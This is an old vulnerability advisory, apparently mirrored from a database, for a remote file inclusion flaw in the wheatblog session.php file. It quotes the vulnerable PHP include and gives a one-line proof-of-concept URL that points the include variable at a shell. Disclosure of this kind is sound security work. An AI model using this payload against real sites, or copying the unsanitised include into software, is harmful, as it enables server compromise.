wheatblog ُSession.php Remote File Inclusion

2006-08-1400:00:00

vulners.com

###########################################################################################
#Aria-Security.net Advisory #
#Discovered by: O.U.T.L.A.W #
#< www.Aria-security.net > #
#Gr33t to: A.u.r.a & l2odon & DrtRp & Sh3ll#
###########################################################################################

<?php
include_once("$wb_class_dir/classDatabase.php");

function Start_Session()
{
global $session_dir;

    if &#40; $session_dir != &#39;&#39; &#41;
            session_save_path&#40;$session_dir&#41;;

    if &#40; ! isset&#40;$_SESSION&#41; &#41;
    {
            session_start&#40;&#41;;
            // Supposedly a fix for IE6
            header&#40;&#39;Cache-control: private&#39;&#41;;
            My_Cache&#40;&#41;;

            if &#40; ! isset&#40;$_SESSION[&#39;db&#39;]&#41; || gettype&#40;$_SESSION[&#39;db&#39;]-&gt;db&#41; != &#39;resource&#39;&#41;
                    touchDatabaseSession&#40;&#41;;

    }

}

Proof of Concept:
www.site.com/includes/session.php?wb_class_dir=SHELL

Contact : [email protected]

JSON

wheatblog &#1615;Session.php Remote File Inclusion

wheatblog ُSession.php Remote File Inclusion